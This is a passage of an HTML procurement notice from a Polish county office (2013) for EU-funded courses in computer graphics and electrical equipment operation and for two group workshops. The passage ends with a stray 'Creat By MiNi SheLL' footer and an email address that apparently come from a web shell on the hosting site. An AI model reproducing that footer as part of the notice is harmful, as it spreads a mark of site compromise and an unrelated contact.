zakończenie kursu: maksymalnie (najpóźniej) do 13 grudnia 2013 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie 2 - Kurs grafiki komputerowej - dla 1 osoby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalny czas trwania kursu - 30 godzin, oraz EGZAMIN - część praktyczna i część teoretyczna. 
Ramowy program kursu, zajęć: malowanie, selekcja obrazu, filtry korekcyjne, retusz sylwetki i budowy ciała, efekty specjalne, formatowanie obrazu.
Zamawiający dopuszcza organizację i przeprowadzenie realizacji zadania przez połączenie grupy uczestników/uczestniczek kursu z ogólnodostępnym kursem organizowanym przez Wykonawcę poza niniejszym zamówieniem, pod warunkiem, że nie będzie to miało wpływu, na jakość i terminowość świadczonych usług na rzecz Zamawiającego. Wykonawca nie ma obowiązku informowania Zamawiającego o zaistnieniu tych okoliczności.
Materiały szkoleniowe dla uczestniczek/uczestników:
Notatnik, długopis, pendrive i/lub inny nośnik danych z zapisanymi materiałami szkoleniowymi typu: schematy, słownik, nagrania.
Materiały szkoleniowe przeznaczone na potrzeby kursów powinny zapewnić wysoki poziom merytoryczny, przejrzystość i spójność zawartych informacji oraz rzeczowość i kompleksowość. Materiały winny być przekazane na stałe uczestnikom/uczestniczkom kursu oraz 1 komplet lub kserokopia lub zdjęcia dla Zamawiającego. Wykonawca powinien udokumentować przekazanie kursantom/kursantkom materiałów szkoleniowych przez ich sfotografowanie, sporządzenie ich wykazu oraz dokumentu potwierdzającego ich odebranie przez właściwe osoby. 
Materiały winny być oznakowane zgodnie z wytycznymi dostępnymi na stronie internetowej http://www.efs.gov.pl, zakładka Dokumenty nt.: Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
Ukończenie kursu winno dawać umiejętności edytowania grafiki komputerowe oraz fotografiki cyfrowej.
Kurs powinien kończyć się egzaminem teoretycznym i praktycznym.
Po odbyciu kursu i zdaniu egzaminów uczestnik projektu winien otrzymać certyfikat.
Termin realizacji kursu:
rozpoczęcie kursu: zalecany termin rozpoczęcia kursu - wrzesień 2013 roku,
zakończenie kursu: maksymalnie (najpóźniej) do 13 grudnia 2013 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - Kurs eksploatacji urządzeń energetycznych o napięciu  do 1 kV - dla 1 osoby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalny czas trwania kursu - 16 godzin oraz EGZAMIN
Program kursu powinien obejmować takie zagadnienia jak: prawo energetyczne, bezpieczeństwo i higiena pracy z urządzeniami energetycznymi, eksploatacja urządzeń elektrycznych.
Zamawiający dopuszcza organizację i przeprowadzenie realizacji zadania przez połączenie grupy uczestników/uczestniczek kursu z ogólnodostępnym kursem organizowanym przez Wykonawcę poza niniejszym zamówieniem, pod warunkiem, że nie będzie to miało wpływu, na jakość i terminowość świadczonych usług na rzecz Zamawiającego. Wykonawca nie ma obowiązku informowania Zamawiającego o zaistnieniu tych okoliczności
Ukończenie kursu winno dawać uprawnienia w zakresie eksploatacji urządzeń energetycznych o napięciu do 1 kV.
Materiały szkoleniowe dla uczestniczek/uczestników:
Notatnik, długopis, wydruki lub pendrive albo inny nośnik danych z zapisanymi materiałami szkoleniowymi typu: informacje, ćwiczenia, testy, schematy.
Materiały szkoleniowe przeznaczone na potrzeby kursów powinny zapewnić wysoki poziom merytoryczny, przejrzystość i spójność zawartych informacji oraz rzeczowość i kompleksowość. Materiały winny być przekazane na stałe uczestnikom/uczestniczkom kursu oraz 1 komplet lub kserokopia lub zdjęcia dla Zamawiającego. Wykonawca powinien udokumentować przekazanie kursantom/kursantkom materiałów szkoleniowych przez ich sfotografowanie, sporządzenie ich wykazu oraz dokumentu potwierdzającego ich odebranie przez właściwe osoby. 
Po odbyciu kursu i zdaniu egzaminów uczestnik projektu winien otrzymać certyfikat.
Kurs może odbywać się w systemie dziennym lub zaocznym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 4 - Warsztat kompetencji zawodowych (dwudniowy, wyjazdowy, grupowy) dla maksymalnie 18 osób - uczestników/czek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ramowy plan warsztatów:
termin warsztatów: uzgodniony z Wykonawcą i uczestnikami/czkami Projektu - sobota/niedziela od 01.10.2013 roku - 30.11.2013 roku
WYJAZD:godz. 8.00
miejsce Starostwo Powiatowe w Lęborku, ul. Czołgistów 5
POWRÓT: około godz. 18.00
miejsce Starostwo Powiatowe w Lęborku
MIEJSCE ODBYWANIA WARSZTATÓW: (wskazane przez Wykonawcę)
Dwie grupy warsztatowe: grupa A - 9 uczestników/czek i - grupa B - 9 uczestników/czek
Program: 
Merytoryczne zajęcia warsztatowe muszą być prowadzone oddzielnie dla grupy A i B.
Kolejność zajęć warsztatów - harmonogram ustalany będzie przez Wykonawcę w uzgodnieniu z Zamawiającym.
Zakres warsztatów musi uwzględniać wskazaną tematykę i czas trwania zajęć zgodnie z załącznikiem 1-1d do SIWZ
Materiały szkoleniowe dla uczestników/czek:
wydruki materiałów z prowadzonych zajęć, wpięte w segregator lub teczkę,wzory druków podatkowych, ZUS,notatnik,długopis.
Materiały szkoleniowe przeznaczone na potrzeby warsztatów powinny zapewnić wysoki poziom merytoryczny, przejrzystość i spójność zawartych informacji oraz rzeczowość i kompleksowość. Materiały winny być przekazane na stałe uczestniczkom/czkom zajęć oraz jeden komplet dla Zamawiającego. Wykonawca powinien udokumentować przekazanie materiałów szkoleniowych przez ich sfotografowanie, sporządzenie ich wykazu oraz dokumentu potwierdzającego ich odebranie przez właściwe osoby.
Materiały winny być oznakowane zgodnie z wytycznymi dostępnymi na stronie internetowej http://www.efs.gov.pl, zakładka Dokumenty nt.: Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0, 98.34.10.00-5, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5 - Warsztat kompetencji społeczno-zawodowych (dwudniowy, wyjazdowy, grupowy) - dla maksymalnie 14 osób - uczestników/czek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ramowy plan warsztatów:
termin warsztatów: uzgodniony z Wykonawcą i uczestnikami/czkami Projektu - sobota/niedziela od 01.10.2013 roku - 30.11.2013 roku 
WYJAZD:godz. 8.00 miejsce Starostwo Powiatowe w Lęborku, ul. Czołgistów 5
POWRÓT:około godz. 16.00 miejsce Starostwo Powiatowe w Lęborku
MIEJSCE ODBYWANIA WARSZTATÓW: (wskazane przez Wykonawcę)
Program:
Kolejność zajęć warsztatów - harmonogram ustalany będzie przez Wykonawcę w uzgodnieniu z Zamawiającym.
Zakres warsztatów musi uwzględniać wskazaną tematykę i czas trwania zajęć zgodnie z załącznikiem 1-1d do SIWZ
Materiały szkoleniowe dla uczestników/czek:
wydruki materiałów z prowadzonych zajęć, wpięte w segregator lub teczkę,
notatnik,
długopis.
Materiały szkoleniowe przeznaczone na potrzeby warsztatów powinny zapewnić wysoki poziom merytoryczny, przejrzystość i spójność zawartych informacji oraz rzeczowość i kompleksowość. Materiały winny być przekazane na stałe uczestniczkom/czkom zajęć oraz jeden komplet dla Zamawiającego. Wykonawca powinien udokumentować przekazanie materiałów szkoleniowych przez ich sfotografowanie, sporządzenie ich wykazu oraz dokumentu potwierdzającego ich odebranie przez właściwe osoby. 
Materiały winny być oznakowane zgodnie z wytycznymi dostępnymi na stronie internetowej http://www.efs.gov.pl, zakładka Dokumenty nt.: Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0, 98.34.10.00-5, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com